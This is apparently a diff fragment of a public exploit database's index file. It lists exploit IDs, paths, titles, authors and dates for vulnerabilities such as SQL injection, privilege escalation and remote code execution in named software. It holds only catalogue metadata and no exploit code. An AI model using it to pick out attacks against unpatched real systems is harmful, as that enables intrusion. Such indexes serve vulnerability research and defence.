41619,exploits/windows/local/41619.txt,"Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,local,windows,
43359,exploits/linux/local/43359.c,"Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape",2017-01-04,"Sebastian Krahmer",local,linux,
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@ -9394,6 +9398,7 @@ id,file,description,date,author,type,platform,port
43247,exploits/macos/local/43247.md,"Apple macOS 10.13.1 (High Sierra) - Insecure Cron System Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
43248,exploits/macos/local/43248.md,"Apple macOS 10.13.1 (High Sierra) - 'Blank Root' Local Privilege Escalation",2017-11-28,Lemiorhan,local,macos,
43331,exploits/linux/local/43331.txt,"glibc ld.so - Memory Leak / Buffer Overflow",2017-12-13,"Qualys Corporation",local,linux,
43345,exploits/linux/local/43345.c,"Linux kernel < 4.10.15 - Race Condition Privilege Escalation",2017-12-15,anonymous,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote (PoC)",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -15842,6 +15847,9 @@ id,file,description,date,author,type,platform,port
41598,exploits/cgi/remote/41598.rb,"NETGEAR R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit)",2017-03-13,Metasploit,remote,cgi,80
41613,exploits/windows/remote/41613.rb,"IBM WebSphere - RCE Java Deserialization (Metasploit)",2017-03-15,Metasploit,remote,windows,8800
41614,exploits/multiple/remote/41614.rb,"Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit)",2017-03-15,Metasploit,remote,multiple,8080
43353,exploits/android/remote/43353.py,"Outlook for Android - Attachment Download Directory Traversal",2017-12-18,"Google Security Research",remote,android,
43356,exploits/php/remote/43356.rb,"Western Digital MyCloud - 'multi_uploadify' File Upload (Metasploit)",2017-12-18,Metasploit,remote,php,
43360,exploits/linux/remote/43360.py,"GoAhead httpd 2.5 < 3.6.5 - 'LD_PRELOAD' Remote Code Execution",2017-12-18,"Daniel Hodson",remote,linux,80
41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows,
41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
@ -36890,7 +36898,7 @@ id,file,description,date,author,type,platform,port
39996,exploits/java/webapps/39996.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - Directory Traversal",2016-06-21,ERPScan,webapps,java,
39997,exploits/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2016-06-21,"David Silveiro",webapps,ruby,80
39998,exploits/php/webapps/39998.txt,"YetiForce CRM < 3.1 - Persistent Cross-Site Scripting",2016-06-21,"David Silveiro",webapps,php,80
40111,exploits/php/webapps/40111.txt,"Joomla! Component Guru Pro - SQL Injection",2016-07-14,s0nk3y,webapps,php,80
40111,exploits/php/webapps/40111.txt,"Joomla! Component Guru Pro - 'Itemid' SQL Injection",2016-07-14,s0nk3y,webapps,php,80
40006,exploits/php/webapps/40006.txt,"Alibaba Clone B2B Script - Arbitrary File Disclosure",2016-06-23,"Meisam Monsef",webapps,php,80
40009,exploits/php/webapps/40009.txt,"XuezhuLi FileSharing - Directory Traversal",2016-06-23,HaHwul,webapps,php,80
40010,exploits/php/webapps/40010.html,"XuezhuLi FileSharing - Cross-Site Request Forgery (Add User)",2016-06-23,HaHwul,webapps,php,80
@ -37627,6 +37635,11 @@ id,file,description,date,author,type,platform,port
41616,exploits/ruby/webapps/41616.rb,"GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution",2017-03-15,iblue,webapps,ruby,
41617,exploits/php/webapps/41617.txt,"Steam Profile Integration 2.0.11 - SQL injection",2017-03-13,DrWhat,webapps,php,
41618,exploits/aspx/webapps/41618.txt,"Sitecore CMS 8.1 Update-3 - Cross-Site Scripting",2017-03-15,"Pralhad Chaskar",webapps,aspx,
43357,exploits/php/webapps/43357.txt,"Joomla! Component User Bench 1.0 - 'userid' SQL Injection",2017-12-18,"Ihsan Sencan",webapps,php,
43358,exploits/php/webapps/43358.txt,"Joomla! Component My Projects 2.0 - SQL Injection",2017-12-18,"Ihsan Sencan",webapps,php,
43361,exploits/multiple/webapps/43361.md,"vBulletin 5 - 'routestring' Unauthenticated Remote Code Execution",2017-12-13,SecuriTeam,webapps,multiple,
43362,exploits/multiple/webapps/43362.md,"vBulletin 5 - 'cacheTemplates' Unauthenticated Remote Arbitrary File Deletion",2017-12-13,SecuriTeam,webapps,multiple,
43363,exploits/hardware/webapps/43363.py,"Linksys WVBR0 - 'User-Agent' Remote Command Injection",2017-12-14,nixawk,webapps,hardware,
41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php,
41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware,
41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware,
@ -37636,6 +37649,8 @@ id,file,description,date,author,type,platform,port
41633,exploits/hardware/webapps/41633.txt,"DIGISOL DG-HR1400 1.00.02 Wireless Router - Privilege Escalation",2017-03-18,Indrajith.A.N,webapps,hardware,
41634,exploits/php/webapps/41634.txt,"Omegle Clone - SQL Injection",2017-03-18,"Ihsan Sencan",webapps,php,
41636,exploits/php/webapps/41636.txt,"Secure Download Links - 'dc' SQL Injection",2017-03-19,"Ihsan Sencan",webapps,php,
43350,exploits/php/webapps/43350.txt,"Joomla! Component JB Visa 1.0 - 'visatype' SQL Injection",2017-12-18,"Ihsan Sencan",webapps,php,
43351,exploits/php/webapps/43351.txt,"Joomla! Component Guru Pro - 'promocode' SQL Injection",2017-12-18,"Ihsan Sencan",webapps,php,
41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80
@ -38376,3 +38391,4 @@ id,file,description,date,author,type,platform,port
43340,exploits/windows/webapps/43340.rb,"Advantech WebAccess 8.2-2017.03.31 - Webvrpcs Service Opcode 80061 Stack Buffer Overflow (Metasploit)",2017-12-14,Metasploit,webapps,windows,4592
43343,exploits/cgi/webapps/43343.py,"ITGuard-Manager 0.0.0.1 - Remote Code Execution",2017-12-15,"Nassim Asrir",webapps,cgi,
43346,exploits/php/webapps/43346.txt,"Movie Guide 2.0 - SQL Injection",2017-12-15,"Ihsan Sencan",webapps,php,80
43348,exploits/php/webapps/43348.txt,"Monstra CMS 3.0.4 - Arbitrary File Upload / Remote Code Execution",2017-12-18,"Ishaq Mohammed",webapps,php,